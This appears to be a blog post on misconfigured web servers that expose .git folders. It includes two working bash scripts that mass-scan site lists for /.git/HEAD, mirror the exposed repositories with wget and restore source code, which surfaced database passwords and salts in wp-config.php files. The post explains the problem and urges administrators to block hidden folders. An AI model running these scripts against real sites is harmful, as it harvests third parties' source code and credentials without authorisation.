The Git version control system stores all its data about current and past revisions of files in a hidden folder, called .git. By convention, one does not include information such as passwords in Git and instead should use environmental variables or other configuration methods. However, due to poor programming practices and the general laziness of developers in major software platforms, it is common for developers to include sensitive information.
Most sane web servers will block access to hidden directories or files. Apache typically blocks .htaccess files from being seen. However, it seems that many do not deny access to .git folders.
When a server allows listing all files in a directory, you can use a tool to download all files contained within that folder.
Common Linux utilities such as wget allow for mirroring a website with a single command. By downloading a list of popular websites, you can quickly check and mirror a great number incredibly quickly.
A simple bash script can take a list of websites and then download all contents of the folder. Here is a simple script that would take a given list, check if a .git folder exists, and then proceed to download that directory if possible.
#!/bin/bash
IFS=' ' read -r -a array <<< "$1"
echo "[${array[0]}] Checking ${array[1]}"
STATUSCODE=$(curl -L --silent --output /dev/null --write-out "%{http_code}" --max-time 5 http://${array[1]}/.git/HEAD)
if test $STATUSCODE = 200; then
echo "${array[0]} Got 200 on ${array[1]}"
wget -r --no-parent --connect-timeout=5 http://${array[1]}/.git/
fi
I ran this script on the Alexa top million sites. This yielded a surprising number of sites with .git directories.
Many websites return a 200 status code even though they say the page was not found. Additionally, a .git folder does not immediately show the source code.
It is fairly easy to clean up the results with a few simple commands. Again, a simple bash script can automate this.
#!/bin/bash
find . -name '*index.html*' -type f -delete
for D in "./"*
do
if test -f $D/.git/HEAD
then
echo $D
(
cd $D
git reset --hard HEAD
if [ $? -eq 0 ]; then
cd ..
mv $D ../valid/
fi
)
fi
done
This script file removes any HTML files that would interfere with Git, checks if the .git folder contains a HEAD, restores the source code from the history, and finally moves the code into a new folder where I can do further analysis.
I only ran my script through about 30,000 sites, which found 6 WordPress installs, including wp-config.php files. These configuration files contain usernames and passwords for the database and keys and salts. Sites that did not run WordPress are also included, and most still have database connection information.
While I could connect to these servers and export or dump the databases, I would not be able to do so in good conscience (and, of course, I do not wish to commit a crime).
A surprising number of websites have publicly accessible and indexable .git folders. With this, one could download a copy of the source code, and more often than not retrieve confidential information such as database passwords or salts.
Systems administrators absolutely must deny access to hidden files and folders to prevent similar attacks from being performed on websites.
Note: I do not suggest that running these scripts is a good idea. I did all of this for purely educational reasons. After briefly looking at some of this code obtained, I purged any remaining files from my servers and did not disclose any information about the sites.